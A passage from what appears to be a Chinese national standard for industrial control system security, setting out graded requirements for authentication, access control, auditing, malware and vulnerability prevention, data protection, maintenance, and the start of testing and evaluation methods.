系统和网络环境下共享身份认证证书; f) 应具备登录失败处理功能,多次登录失败后应结束会话、限制非法登录次数并自动退出;对高 可用性的控制系统,应保留其数据采集、逻辑控制、网络通信和系统报警等基本功能,取消用户 对系统的参数修改等较高级别权限并将登录权限降至最低; g) 登录用户执行更改配置等重要操作时应再次进行身份鉴别; h) 应设置鉴别警示信息并描述因未授权访问可能导致的后果; i) 当非法登录次数达到预设值时,应记录相应日志并向网络管理主机发送报警信息。 6 . 4 . 1 . 2 第二级 本项要求包括: a) 应符合 6 . 4 . 1 . 1; b) 用户身份鉴别信息丢失或失效时,应具有安全重置身份鉴别信息的功能; c) 身份鉴别信息不易被冒用,口令应采用数字、字母和特殊字符混排等无规律的组合方式,口令 长度应不少于 8位,每三个月应更换 1次,更新的口令至少 5次内不应重复;如设备口令长度 不支持 8位或其他复杂度要求,应使用所支持的最长长度并缩短更换周期;可使用动态密码卡 等一 次性口令认证方式;口令应加密存储; d) 应实现操作系统和数据库系统特权用户的权限分离; e) 当对服务器进行远程管理时,应采用 VPN等接入方式防止身份鉴别信息在网络传输过程中 被窃取。 6 . 4 . 1 . 3 第三级 ~第四级 本项要求包括: a) 应符合 6 . 4 . 1 . 2; b) 应采用口令、密码和生物识别等两种或两种以上组合的鉴别方式对用户身份进行鉴别,且其中 至少一种鉴别方式应使用密码技术实现。 6 . 4 . 2 访问控制 6 . 4 . 2 . 1 第 一 级 本项要求包括: a) 应按满足工作要求的最小特权原则对登录主机的用户分配账户和权限; b) 分配账户权限不应超出工作需要并应进行动态审计,不应存在共享账户,及时删除或停用多余 的和过期的账户; c) 应拆除或封闭工业主机上不必要的移动存储媒体、光驱、无线等接口;若需使用,应通过主机外 设安全管理技术手段实施访问控制; d) 工业主机需远程维护时,应采用 VPN等接入方式。 6 . 4 . 2 . 2 第二级 本项要求包括: a) 应符合 6 . 4 . 2 . 1; b) 应符合 GB/T22239 — 2019中 7 . 1 . 4 . 2d); c) 应保留工业主机的相关访问日志,并对操作过程进行安全审计; d) 应对敏感信息资源设置安全标记并控制主体对安全标记信息资源的访问。 6 . 4 . 2 . 3 第三级 本项要求包括: a) 应符合 6 . 4 . 2 . 2[6 . 4 . 2 . 2b)和 d)除外]; b) 应进行角色划分,并授予管理用户所需的最小权限,实现管理用户的权限分离; c) 按 GB/T22239 — 2019中 8 . 1 . 4 . 2f); d) 应建立基于主、客体访问关系的访问行为白名单机制并对重要主体、客体设置安全标记,主机 不支持安全标记的,应在系统级生成安全标记并使系统整体支持强制访问控制机制。 6 . 4 . 2 . 4 第四级 本项要求包括: a) 应符合 6 . 4 . 2 . 3[6 . 4 . 2 . 3d)除外]; b) 应建立基于主、客体访问关系的访问行为白名单机制并对所有主体、客体设置安全标记,主机 不支持安全标记的,应在系统级生成安全标记并使系统整体支持强制访问控制机制; c) 应依据安全策略和所有主体、客体设置的安全标记控制主体对客体的访问; d) 应采用基于身份、角色和规则等的访问控制策略以及访问控制列表、访问控制许可、密码等访 问执行机制实现ICS主机用户或用户进程与设备、文件、进程、程序、域等对象间的访问控制。 6 . 4 . 3 安全审计 6 . 4 . 3 . 1 第 一 级 无要求。 6 . 4 . 3 . 2 第二级 本项要求包括: a) 应对重要用户行为和安全事件进行审计,审计范围应覆盖服务器和重要客户端上的每个操作 系统和数据库用户;主机操作系统不支持该要求的,应采用其他安全审计产品进行审计; b) 审计内容应包括重要用户行为、系统资源的异常使用和重要系统命令的使用等重要信息,至少 包括:用户的添加和删除、审计功能的启动和关闭、审计策略的调整、权限变更、系统资源的异 常使用、重要的系统操作(如用户登录、退出)等; c) 应符合 GB/T22239 — 2019中 7 . 1 . 4 . 3b); d) 应由系统范围内唯一确定的时钟产生审计记录的时间; e) 应符合 GB/T22239 — 2019中 7 . 1 . 4 . 3c); f) 审计记录的留存时间应不少于六个月。 6 . 4 . 3 . 3 第三级 本项要求包括: a) 应符合 6 . 4 . 3 . 2; b) 应符合 GB/T22239 — 2019中 8 . 1 . 4 . 3d) 。 6 . 4 . 3 . 4 第四级 本项要求包括: a) 应符合 6 . 4 . 3 . 3[6 . 4 . 3 . 2c)除外]; b) 应根据ICS的统一安全策略实现集中审计; c) 应符合 GB/T22239 — 2019中 9 . 1 . 4 . 3b) 。 6 . 4 . 4 入侵防范 6 . 4 . 4 . 1 第 一 级 本项要求包括: a) 应按最小安装原则安装操作系统,仅安装必要的组件和应用程序; b) 应在工业主机中实施应用程序白名单等检测和防止非授权软件运行的控制措施,仅允许安装 和运行经过组织授权和安全评估的软件; c) 应符合 GB/T22239 — 2019中 6 . 1 . 4 . 3b); d) 实施的安全控制措施安装前应通过离线环境测试; e) 应定期检查工业主机安全控制措施的有效性,并在失效时及时报警; f) 针对网络攻击采取的技术措施不应对ICS的正常运行产生影响。 6 . 4 . 4 . 2 第二级 本项要求包括: a) 应符合 6 . 4 . 4 . 1; b) 应符合 GB/T22239 — 2019中 7 . 1 . 4 . 4c); c) 应有检测和防止针对工业主机的网络攻击行为的审计日志。 6 . 4 . 4 . 3 第三级 ~第四级 本项要求包括: a) 应符合 6 . 4 . 4 . 2; b) 应能对重要程序的完整性进行检测,并具有完整性恢复的能力; c) 应能检测到对主机的入侵行为,应能记录入侵的网络地址、攻击类型、攻击目的、攻击时间,并 在发生严重入侵事件时报警。 6 . 4 . 5 恶意代码防范 6 . 4 . 5 . 1 第 一 级 ~第二级 本项要求包括: a) 工业主机正式运行前不应存在恶意代码程序; b) 应在工业主机上安装通过测试的防恶意代码软件或独立部署恶意代码防护设备,且仅允许运 行经过组织授权和安全评估的防恶意代码软件或应用程序白名单软件; c) 在读取移动存储设备上的数据以及网络上接收的文件和邮件前应进行病毒检查,外来计算机 或存储设备接入系统前应进行恶意代码检查; d) 防恶意代码软件应能监测可能被用于感染系统和向其他系统传播恶意软件的应用程序的 活动; e) 应及时清理注册表、恶意锁定主页等被恶意软件修改的启动选项; f) 应及时清理系统中存在的木马、病毒、恶意代码程序; g) 应定期升级和更新防恶意代码软件版本和恶意代码库,更新前应在离线环境中进行安全性和 兼容性测试,必要时应在离线环境中试运行; h) 如系统不支持升级和更新防恶意代码软件版本和恶意代码库,应独立部署恶意代码防护设备。 6 . 4 . 5 . 2 第三级 本项要求包括: a) 应符合 6 . 4 . 5 . 1; b) 应支持防恶意代码软件的统一 管理; c) 当检测到恶意软件攻击事件时,应记录攻击源网络地址、攻击发生时间、恶意软件类型、被攻击 目标,并对攻击造成的影响进行分析; d) 应对获得的恶意软件样本进行分析,获取恶意软件可能使用的域名、网络地址、通信端口、攻击 方式和执行流程,并探测其攻击源头,实现对恶意软件的追溯; e) 应符合 GB/T22239 — 2019中 8 . 1 . 4 . 5 。 6 . 4 . 5 . 3 第四级 本项要求包括: a) 应符合 6 . 4 . 5 . 3; b) 应符合 GB/T22239 — 2019中 9 . 1 . 4 . 5 。 6 . 4 . 6 漏洞防范 本项要求包括: a) 应对补丁进行安全测试,必要时应在离线环境中试运行,通过后安装; b) 应借助专用工具进行漏洞扫描,工具使用前应经过安全性测试并取得相应使用许可证; c) 如无法通过补丁或更改配置等措施解决工业主机漏洞,应基于对漏洞系统关键性的充分考虑 采取停用脆弱服务、移除软件、移除设备或系统隔离等手段; d) 如因停用存在漏洞的服务导致ICS关键功能不可用,应首先隔离存在漏洞的系统,有效锁定其 安全区域并防止在区域边界对其进行异常访问。 6 . 4 . 7 移动存储媒体防护 6 . 4 . 7 . 1 第 一 级 本项要求包括: a) 移动存储媒体接入设备时,应通过设备自带的安全管理软件或中间机等外设技术手段实行访 问控制; b) 不应跨安全区域使用移动存储媒体。 6 . 4 . 7 . 2 第二级 本项要求包括: a) 应符合 6 . 4 . 7 . 1; b) 移动存储媒体接入设备时应进行日志记录。 6 . 4 . 7 . 3 第三级 ~第四级 本项要求包括: a) 应符合 6 . 4 . 7 . 2; b) 应对移动存储媒体进行可信标识和认证,并仅允许通过认证的可信移动存储媒体接入主机; c) 应基于对移动存储媒体建立的可信标识对其用户角色与权限建立相应策略,根据用户角色分 配明确的移动存储媒体使用权限,禁止越权使用和随意复制数据。 6 . 4 . 8 剩余信息保护 6 . 4 . 8 . 1 第 一 级 无要求。 6 . 4 . 8 . 2 第二级 本项要求包括: a) 应符合 6 . 4 . 8 . 1; b) 操作系统和数据库系统用户的鉴别信息所在硬盘或内存的存储空间被释放或重新分配前,应 彻底清除上述信息。 6 . 4 . 8 . 3 第三级 ~第四级 本项要求包括: a) 应符合 6 . 4 . 8 . 2; b) 应在存储空间被释放或重新分配给其他用户前彻底清除系统内的文件、目录和数据库记录等 数据。 6 . 4 . 9 资源控制 6 . 4 . 9 . 1 第 一 级 无要求。 6 . 4 . 9 . 2 第二级 本项要求包括: a) 应符合 6 . 4 . 9 . 1; b) 应根据工作需要限制单个用户对系统资源的最大使用限度。 6 . 4 . 9 . 3 第三级 ~第四级 本项要求包括: a) 应符合 6 . 4 . 9 . 2; b) 应通过设定终端接入方式、网络地址范围等条件限制终端登录; c) 应设置登录终端的操作超时锁定安全策略; d) 应对重要服务器的中央处理器、硬盘、内存、网络等资源的使用情况进行监视; e) 应在系统的服务水平降低到预先规定的最小值时进行检测和报警。 6 . 4 . 10 可信验证 6 . 4 . 10 . 1 第 一 级 应符合 GB/T22239 — 2019中 6 . 1 . 4 . 5 。 6 . 4 . 10 . 2 第二级 应符合 GB/T22239 — 2019中 7 . 1 . 4 . 6 。 6 . 4 . 10 . 3 第三级 应符合 GB/T22239 — 2019中 8 . 1 . 4 . 6 。 6 . 4 . 10 . 4 第四级 应符合 GB/T22239 — 2019中 9 . 1 . 4 . 6 。 6 . 5 控制设备安全防护 6 . 5 . 1 身份鉴别 本项要求包括: a) 控制设备应实现对用户登录访问进行鉴别的安全要求,具体应符合 6 . 4 . 1相应等级的要求; b) 如受条件限制控制设备无法符合 a)要求,应由其上位控制或管理设备实现同等功能或通过管 理手段控制。 6 . 5 . 2 访问控制 本项要求包括: a) 控制设备应实现对用户登录访问进行控制的安全要求,具体应符合 6 . 4 . 2相应等级的要求; b) 应对关键操作和指令执行动作实行基于用户权限的访问控制规则; c) 应对所有操作、管理活动采取会话锁定措施; d) 如受条件限制控制设备无法符合 a) ~c)要求,应由其上位控制或管理设备实现同等功能或通 过管理手段控制。 6 . 5 . 3 安全审计 本项要求包括: a) 控制设备应实现对重要用户行为和重要安全事件进行审计的要求,具体应符合 6 . 4 . 3相应等 级的要求; b) 如受条件限制控制设备无法符合 a)要求,应由其上位控制或管理设备实现同等功能或通过管 理手段控制。 6 . 5 . 4 入侵防范 6 . 5 . 4 . 1 第 一 级 ~第二级 本项要求包括: a) 控制设备应实现对各种入侵行为进行安全防范的要求,具体应符合 6 . 4 . 4 . 1和 6 . 4 . 4 . 2相应等 级的要求; b) 如受条件限制控制设备无法符合 a)要求,应由其上位控制或管理设备实现同等功能或通过管 理手段控制; c) 核心控制设备前端部署的防护设备应具备旁路功能,当防护设备出现断电或其他软硬件故障 时,应使防护设备内部接口与外部接口直接物理连通以保持内部网络与外部网络的正常通信, 并及时告警。 6 . 5 . 4 . 2 第三级 ~第四级 本项要求包括: a) 应符合 6 . 5 . 4 . 1; b) 可在 PLC、RTU以及 DCS现场控制单元等核心控制设备前端部署具备工业控制协议深度包 检测功能的防护设备,能对采用 OPC、Profinet等主流工业控制协议进行现场通信的数据进行 深度包分析和检测过滤,具备检测或阻断不符合协议结构的数据包、不符合正常生产业务范围 的数据内容等功能。 6 . 5 . 5 恶意代码防范 本项要求包括: a) 控制设备应实现对各种恶意代码进行安全防范的要求,具体应符合 6 . 4 . 5相应等级的要求; b) 应支持对可执行程序、静态库、动态库的白名单防护配置; c) 应具备对关键上位机 HMI的外部物理接口的启用、禁用控制能力; d) 应能对通过外部物理接口接入的可移动设备生成使用记录; e) 如受条件限制控制设备无法符合 a) ~d)要求,应由其上位控制或管理设备实现同等功能或通 过管理手段控制。 6 . 5 . 6 软件容错 6 . 5 . 6 . 1 第 一 级 应提供数据有效性校验功能,通过 HMI或通信接口输入的内容应符合系统设定的要求。 6 . 5 . 6 . 2 第二级 ~第四级 本项要求包括: a) 应符合 6 . 5 . 6 . 1; b) 在故障发生时,应能继续提供部分功能,并能够实施必要的措施; c) 在故障发生时,应提供自动恢复功能,自动保存易失性数据和所有状态,故障修复后,系统应恢 复原工作状态。 6 . 5 . 7 漏洞防范 本项要求包括: a) 应借助专用工具进行漏洞扫描,工具使用前应经过安全性测试并取得相应使用许可资质; b) 应使用专用设备和专用软件对控制设备的漏洞进行补丁更新; c) 如工业控制设备漏洞无法通过补丁或更改配置等有效措施解决,应根据漏洞系统关键性采取 停用脆弱服务、移除软件、移除设备或系统隔离等手段; d) 如因停用存在漏洞的服务导致ICS关键功能不可用,应首先隔离存在漏洞的工业控制设备,有 效锁定其安全区域并防止在区域边界对其有任何异常访问。 6 . 5 . 8 资源控制 本项要求包括: a) 应通过设定终端接入方式、网络地址范围等条件限制终端登录; b) 应对系统的最大并发会话连接数进行限制; c) 当通信双方中一方在一段时间内未做响应,另一方应自动结束对话; d) 应对单个账户的多重并发会话进行限制。 6 . 6 数据安全防护 6 . 6 . 1 数据采集 本项要求包括: a) 应明确数据采集的目的、用途、获取源、范围和频度; b) 应对数据采集环境、设施和技术采取必要的安全管控措施。 6 . 6 . 2 数据传输 6 . 6 . 2 . 1 第 一 级 应在传输过程中对重要数据进行完整性校验,包括但不限于鉴别数据、重要配置数据等。 6 . 6 . 2 . 2 第二级 本项要求包括: a) 应符合 6 . 6 . 2 . 1; b) 应符合 GB/T22239 — 2019中 7 . 5 . 2 . 2 。 6 . 6 . 2 . 3 第三级 本项要求包括: a) 应符合 6 . 6 . 2 . 2(6 . 6 . 2 . 1除外); b) 应在传输过程中对重要数据进行完整性校验或采用密码技术保护重要数据在传输过程中的完 整性,包括但不限于鉴别数据、重要业务数据、重要审计数据和重要配置数据等; c) 应采用密码技术保护重要数据在传输过程中的保密性,包括但不限于鉴别数据和重要业务数 据等; d) 在可能涉及法律责任认定的应用中,应采用密码技术提供数据原发证据和数据接收证据,实现 数据原发行为的抗抵赖和数据接收行为的抗抵赖。 6 . 6 . 2 . 4 第四级 本项要求包括: a) 应符合 6 . 6 . 2 . 3[6 . 6 . 2 . 3b)除外]; b) 应采用密码技术保护重要数据在传输过程中的完整性,包括但不限于鉴别数据、重要业务数 据、重要审计数据和重要配置数据等。 6 . 6 . 3 数据存储 6 . 6 . 3 . 1 第 一 级 数据存储媒体应存放在安全的环境中,并应对各类存储媒体使用进行控制和管理。 6 . 6 . 3 . 2 第二级 本项要求包括: a) 应符合 6 . 6 . 3 . 1; b) 应对安全评估数据、现场组态开发数据、系统联调数据、现场变更测试数据、应急演练数据等测 试数据采取签订保密协议、回收测试数据等措施进行保护。 6 . 6 . 3 . 3 第三级 本项要求包括: a) 应符合 6 . 6 . 3 . 2; b) 应对重要存储媒体中的数据和软件进行加密存储,并根据所存储数据和软件的重要程度对媒 体进行分类和标识管理; c) 应在存储过程中对重要数据进行完整性校验或采用密码技术保护重要数据在存储过程中的完 整性,包括但不限于鉴别数据、重要业务数据、重要审计数据和重要配置数据等; d) 应采用密码技术保护重要数据在存储过程中的保密性,包括但不限于鉴别数据、重要业务数 据、重要审计数据和重要配置数据等。 6 . 6 . 3 . 4 第四级 本项要求包括: a) 应符合 6 . 6 . 3 . 3[6 . 6 . 3 . 3c)除外]; b) 应采用密码技术保护重要数据在存储过程中的完整性,包括但不限于鉴别数据、重要业务数 据、重要审计数据和重要配置数据等。 6 . 6 . 4 数据应用 本项要求包括: a) 应界定敏感数据范围,并应明确需要监控的移动存储媒体、网络等敏感数据泄露范围; b) 应明确敏感数据的脱敏处理应用场景、方法和流程、涉及部门和人员职责以满足敏感数据脱敏 处理的安全审计要求; c) 应避免使用实际生产数据等敏感数据进行测试,必要情况下应对去除所有敏感细节和内容的 数据进行测试; d) 应对组织测试过程中产生的数据进行保护,禁止未授权获取及使用测试数据。 6 . 6 . 5 数据备份恢复 6 . 6 . 5 . 1 第 一 级 本项要求包括: a) 应定期对工艺参数、配置文件、设备运行数据、生产数据、控制指令等重要业务数据进行备份; b) 应对重要数据进行本地备份,应每天进行一 次差分备份并至少每月进行一 次全备份,数据发生 较大调整后应立即进行全备份,应在场外存放备份存储媒体; c) 应至少每三个月对所备份的重要数据进行一 次恢复测试,备份数据应能可用; d) 灾难恢复能力应符合 RTO小于 24h,RPO小于 7d。 6 . 6 . 5 . 2 第二级 本项要求包括: a) 应符合 6 . 6 . 5 . 1[6 . 6 . 5 . 1d)除外]; b) 应符合 GB/T22239 — 2019中 7 . 1 . 4 . 8b); c) 灾难恢复能力应符合 RTO小于 12h,RPO小于 1d。 6 . 6 . 5 . 3 第三级 本项要求包括: a) 应符合 6 . 6 . 5 . 1[6 . 6 . 5 . 1d)除外]; b) 应根据数据备份的需要对重要存储媒体实行异地备份,存储地的环境要求和管理方法应与本 地备份相同; c) 应符合 GB/T22239 — 2019中 8 . 1 . 4 . 9b); d) 应符合 GB/T22239 — 2019中 8 . 1 . 4 . 9c); e) 灾难恢复能力应符合 RTO小于 10min,RPO小于 30min。 6 . 6 . 5 . 4 第四级 本项要求包括: a) 应符合 6 . 6 . 5 . 3[6 . 6 . 5 . 3e)除外]; b) 应建立异地灾难备份中心,配备灾难恢复所需的通信线路、网络设备和数据处理设备,提供业 务应用的实时切换; c) 灾难恢复能力应符合 RTO为 0,RPO为 0。 6 . 6 . 6 用户信息保护 6 . 6 . 6 . 1 第 一 级 无要求。 6 . 6 . 6 . 2 第二级 ~第四级 本项要求包括: a) 应仅采集和保存业务必需的用户信息; b) 应禁止未授权访问和非法使用用户信息。 6 . 6 . 7 剩余信息保护 6 . 6 . 7 . 1 第 一 级 无要求。 6 . 6 . 7 . 2 第二级 应符合 GB/T22239 — 2019中 7 . 1 . 4 . 9 。 6 . 6 . 7 . 3 第三级 ~第四级 本项要求包括: a) 应符合 6 . 6 . 7 . 2; b) 应符合 GB/T22239 — 2019中 8 . 1 . 4 . 10b) 。 6 . 6 . 8 数据销毁 6 . 6 . 8 . 1 第 一 级 ~第二级 无要求。 6 . 6 . 8 . 2 第三级 ~第四级 本项要求包括: a) 存储媒体销毁前应清除其中的敏感数据,防止信息的非法泄露; b) 对需要送出销毁的存储媒体,应采用多次读写覆盖的方式清除敏感或秘密数据,应销毁无法执 行删除操作的受损存储媒体,保密性较高的信息存储媒体应获得批准并在双人监控下销毁,销 毁记录应妥善保存。 6 . 7 防护产品安全 6 . 7 . 1 标识与鉴别 6 . 7 . 1 . 1 第 一 级 本项要求包括: a) 任何用户均应具有唯一标识; b) 应为每个管理角色规定与之相关的管理员标识、鉴别信息、隶属组、权限等安全属性,并提供使 用默认值对创建的每个管理员的属性进行初始化的功能; c) 应为管理角色进行分级并使不同级别的管理角色具有不同的管理权限; d) 任何用户在执行安全功能前均应进行身份鉴别,若采用口令方式鉴别,应对口令长度和口令复 杂度进行检查; e) 当已通过身份鉴别的管理角色无操作的时间超过规定值但又继续操作时,产品应具备对该管 理角色的身份进行重新鉴别的功能; f) 应为管理角色登录设定一个可修改的鉴别尝试阈值,当不成功登录尝试超过阈值时,系统应能 阻止管理角色的进一 步鉴别请求; g) 管理员鉴别数据应以非明文形式存储。 6 . 7 . 1 . 2 第二级 本项要求包括: a) 应符合 6 . 7 . 1 . 1; b) 应能向管理角色提供除口令以外的证书、智能卡、指纹、虹膜等其他身份鉴别方式。 6 . 7 . 1 . 3 第三级 ~第四级 本项要求包括: a) 应符合 6 . 7 . 1 . 2; b) 任何用户在执行安全功能前均应进行身份鉴别,若对其采用远程方式管理,还应对管理地址进 行识别。 6 . 7 . 2 用户数据保护 本项要求包括: a) 应通过策略配置规定对产品的访问控制要求,防止被非授权查看或获取; b) 应通过访问控制策略对产品控制端访问用户身份进行鉴别,防止被非授权查看或获取; c) 用户数据所在的存储空间被释放或重新分配前,应通过多次读写覆盖等技术手段进行彻底 清除。 6 . 7 . 3 安全管理 本项要求包括如下内容。 a) 应具备以下管理方式: 1) 支持对授权管理角色的口令鉴别方式,口令应采用数字、字母和特殊字符混排等无规律的 组合方式,口令长度应不少于 8位,每三个月应更换 1次;如口令长度不支持 8位或其他 复杂度要求,应使用所支持的最长长度并缩短更换周期; 2) 在授权管理角色请求执行操作之前,应对授权管理员进行身份鉴别; 3) 对授权管理角色选择两种或两种以上组合的鉴别技术进行身份鉴别; 4) 为每一个规定的授权管理角色提供一套唯一 的安全属性。 b) 应具备以下管理功能: 1) 向授权管理角色提供设置和修改安全管理相关的数据参数的功能; 2) 向授权管理角色提供设置、查询和修改各种安全策略的功能; 3) 向授权管理角色提供管理审计日志的功能; 4) 安全防护产品至少支持区分管理员和审计员角色。 6 . 7 . 4 管理信息保护 本项要求包括: a) 产品如通过网络进行管理,应对管理信息进行加密传输; b) 支持远程管理的产品,应提供具有保密措施的远程管理方式,并应对鉴别数据和管理配置信息 进行保护。 6 . 8 系统集中管控 6 . 8 . 1 集中安全管理 6 . 8 . 1 . 1 第 一 级 无要求。 6 . 8 . 1 . 2 第二级 本项要求包括: a) 应符合 GB/T22239 — 2019中 7 . 1 . 5 . 1a); b) 应符合 GB/T22239 — 2019中 7 . 1 . 5 . 1b); c) 应符合 GB/T22239 — 2019中 7 . 1 . 5 . 2a); d) 应符合 GB/T22239 — 2019中 7 . 1 . 5 . 2b) 。 6 . 8 . 1 . 3 第三级 ~第四级 本项要求包括: a) 应符合 6 . 8 . 1 . 2; b) 应符合 GB/T22239 — 2019中 8 . 1 . 5 . 3a); c) 应符合 GB/T22239 — 2019中 8 . 1 . 5 . 3b) 。 6 . 8 . 2 集中安全监控 6 . 8 . 2 . 1 第 一 级 ~第二级 无要求。 6 . 8 . 2 . 2 第三级 本项要求包括: a) 应划分特定的管理区域,建立安全的信息传输路径,并对分布在网络中的安全设备和安全组件 进行管控; b) 应符合 GB/T22239 — 2019中 8 . 1 . 5 . 4c); c) 应在具有集中安全监控功能的系统上呈现 ICS设备间的访问关系,形成基于网络访问关系和 业务操作指令的工业控制行为白名单,应及时发现未定义的信息通信行为以及识别异常的重 要业务操作指令集; d) 应对工业控制现场控制设备、信息安全设备、网络设备、服务器、操作站等设备中的主体和客体 进行登记; e) 应对各类信息安全报警和日志信息进行关联分析,应提取出少量或概括性的重要安全事件或 发掘隐藏的攻击规律,并对存在类似风险的系统进行安全预警; f) 应对安全策略、恶意代码、补丁升级等安全相关事项进行集中监控,应对网络中发生的各类安 全事件进行集中识别、报警和分析并及时处理网络攻击或异常行为,应具备与 ICS统 一 报警、 日志呈现的功能。 6 . 8 . 2 . 3 第四级 本项要求包括: a) 应符合 6 . 8 . 2 . 2; b) 应对安全设备的安全配置现状进行集中分析,并应及时修复设备中存在的漏洞与不安全的配 置策略; c) 应符合 GB/T22239 — 2019中 9 . 1 . 5 . 4g) 。 6 . 8 . 3 集中安全审计 6 . 8 . 3 . 1 第 一 级 无要求。 6 . 8 . 3 . 2 第二级 ~第四级 本项要求包括: a) 应对分散在各个设备上的审计数据进行收集汇总和集中审计,包括:根据安全审计策略对审计 记录进行分类等; b) 应提供按时间段开启和关闭相应类型的安全审计机制; c) 应对各类审计记录进行存储、管理和查询等,审计记录的存储时间应不少于六个月; d) 应对审计记录进行分析处理,包括根据安全审计策略对审计记录进行存储、管理和查询等,并 应生成统一 的审计报告。 7 安全防护保障要求 7 . 1 软件开发安全防护 7 . 1 . 1 自行软件开发 7 . 1 . 1 . 1 第 一 级 无要求。 7 . 1 . 1 . 2 第二级 本项要求包括: a) 应符合 GB/T22239 — 2019中 7 . 1 . 9 . 4a); b) 应在软件开发过程中对其安全性进行测试; c) 应在软件安装前对可能存在的恶意代码、漏洞等进行安全性测试,可自行进行安全性测试并形 成测试报告,也可委托具有相关资质的第三方测试机构进行安全性测试并出具测试报告; d) 应编制软件设计文档和使用指南。 7 . 1 . 1 . 3 第三级 ~第四级 本项要求包括: a) 应符合 7 . 1 . 1 . 2; b) 应符合 GB/T22239 — 2019中 8 . 1 . 9 . 4c) 。 7 . 1 . 2 外包软件开发 7 . 1 . 2 . 1 第 一 级 无要求。 7 . 1 . 2 . 2 第二级 应符合 GB/T22239 — 2019中 7 . 1 . 9 . 5a) 。 7 . 1 . 2 . 3 第三级 ~第四级 本项要求包括: a) 应符合 7 . 1 . 2 . 2; b) 系统建设方应要求系统开发方提供软件源代码,并对软件中可能存在的后门、隐蔽信道、安全 漏洞等安全隐患进行安全性测试,应委托具备相关资质的第三方机构进行测试并出具测试 报告。 7 . 1 . 3 软件测试验收 7 . 1 . 3 . 1 第 一 级 无要求。 7 . 1 . 3 . 2 第二级 本项要求包括: a) 应符合 GB/T22239 — 2019中 7 . 1 . 9 . 7a); b) 应符合 GB/T22239 — 2019中 7 . 1 . 9 . 7b) 。 7 . 1 . 3 . 3 第三级 ~第四级 本项要求包括: a) 应符合 7 . 1 . 3 . 2a); b) 应符合 GB/T22239 — 2019中 8 . 1 . 9 . 7b) 。 7 . 2 系统维护安全防护 7 . 2 . 1 设备维护 7 . 2 . 1 . 1 第 一 级 ~第二级 应对计算机终端、工作站、便携式计算机、系统设备、网络设备和安全防护设备等关键设备(包括备 份和冗余设备)的启动/停止、加电/断电等操作建立安全操作规程,并按规程规定进行操作。 7 . 2 . 1 . 2 第三级 ~第四级 本项要求包括: a) 应符合 7 . 2 . 1 . 1; b) 应符合 GB/T22239 — 2019中 8 . 1 . 10 . 4c); c) 应符合 GB/T22239 — 2019中 8 . 1 . 10 . 4d) 。 7 . 2 . 2 配置变更 7 . 2 . 2 . 1 第 一 级 ~第二级 无要求。 7 . 2 . 2 . 2 第三级 ~第四级 本项要求包括: a) 应对重大配置变更制定变更计划并进行影响分析,配置变更实施前应通过安全测试; b) 应符合 GB/T22239 — 2019中 8 . 1 . 10 . 10c); c) 应控制变更性运维,改变连接、安装系统组件或调整配置参数等操作过程中应保留不可更改的 审计日志,操作结束后应同步更新配置信息库。 7 . 2 . 3 数据备份与恢复 7 . 2 . 3 . 1 第 一 级 应符合 GB/T22239 — 2019中 6 . 1 . 9 . 7a) 。 7 . 2 . 3 . 2 第二级 ~第四级 本项要求包括: a) 应符合 7 . 2 . 3 . 1; b) 应符合 GB/T22239 — 2019中 7 . 1 . 10 . 11c); c) 备份策略应明确备份数据存储媒体的放置场所、文件命名规则、数据备份频率和数据离站运送 方法。 7 . 2 . 4 外包维护 7 . 2 . 4 . 1 第 一 级 本项要求包括: a) 应列出维护过程中允许输入设备的数据、允许从设备输出的数据,并在维护过程中进行检查和 记录; b) 应对来自外部的、在维护过程中进入设备的数据进行安全检查并复制和存档; c) 应对从设备导出的数据存储、传输实施安全保护,并进行跟踪记录; d) 应对维护工具中存有的与控制系统设备相关的数据实施管理,对其导入、导出、传递、存储、清 除进行跟踪记录,并采取措施防止数据泄露、破坏、篡改; e) 同一维护设备用于不同类别控制系统的维护时,应清除设备中存有的数据。 7 . 2 . 4 . 2 第二级 本项要求包括: a) 应符合 7 . 2 . 4 . 1; b) 如使用外部设备开展系统维护,归还设备前应清除相关数据; c) 远程维护或诊断行为应通过审批并对其进行监视和控制,并符合远程设备鉴别、远程通信保 护、访问控制等要求。 7 . 2 . 4 . 3 第三级 ~第四级 本项要求包括: a) 应符合 7 . 2 . 4 . 2; b) 应仅允许来自受控物理区域和信任人员实施远程维护并全程受到监控,并可设立 VPN、加密 防护的专用线路等安全专用通信信道,维护结束后应及时拆除相关的设施并关闭相关的服务; c) 应禁止来自任何非受控物理区域或非信任人员的任何形式的远程维护行为; d) 应控制运维工具的使用,操作过程中应保留不可更改的审计日志,操作结束后应删除工具中的 敏感数据。 8 测试评价方法 8 . 1 物理环境安全保护 8 . 1 . 1 位置选择 可采用人员访谈、文档查阅、人工核查等方法。 内容包括: a) 查阅机房、中心控制室、现场控制室所在建筑物抗震设计审批和验收文件; b) 访谈、核查机房、中心控制室、现场控制室的选址是否符合防火、防尘、防有害气体、防爆、防雷 电、防噪声和震动以及防磁场的要求,对不符合要求的,通过查阅相应的安全防护措施文件并 对其有效性进行核查。 8 . 1 . 2 访问控制 可采用人员访谈、文档查阅、人工核查等方法。 内容包括: a) 核查机房、中心控制室出入口是否按相应安全防护技术要求安排专人值守或配置电子门禁 系统; b) 查阅机房、中心控制室、现场控制室来访人员审批文件、监控过程记录以及对带入带出设备的 使用控制措施是否符合相应要求; c) 核查重要区域是否按要求配置电子门禁系统,并核查是否可以识别、记录进出的人员信息; d) 查阅人员进出记录信息是否保存六个月; e) 核查机房、中心控制室、现场控制室设备和维护操作是否划分了不同的区域; f) 访谈、核查主机房、中心控制室、现场控制室重要工作站、数据库、服务器等工业控制软硬件设 备是否按相应安全防护技术要求采取物理安全访问控制措施。 8 . 1 . 3 防盗窃和防破坏 可采用人员访谈、人工核查等方法。 内容包括: a) 核查服务器、路由器、交换机等设备是否放置在主机房、中心控制室、现场控制室等场所内; b) 访谈、核查检查室外控制设备的外罩保护装置和固定装置是否符合要求; c) 核查主机房、中心控制室、现场控制室内设备或主要部件是否采取固定措施并设置不易除去的 标记,标记物与实际情况是否相符; d) 核查通信线路是否按相应安全防护技术要求铺设在隐蔽处; e) 核查主机房、中心控制室、现场控制室等重要区域是否按相应安全防护技术要求采取防盗和防 破坏措施,并检查相关记录的保存是否符合要求。 8 . 1 . 4 防雷击 可采用文档查阅、人工核查等方法。 内容包括: a) 核查设备电源、信号线路是否加载避雷器或浪涌保护器以及金属管线是否接地; b) 核查室外控制设备的接地防护和等电位连接等措施是否符合要求; c) 查阅机房、中心控制室、现场控制室、现场机柜室的防雷击设计文件并核查防雷措施的部署 情况; d) 核查机房、中心控制室、现场控制室、现场机柜室设施和设备是否采取安全接地防护措施; e) 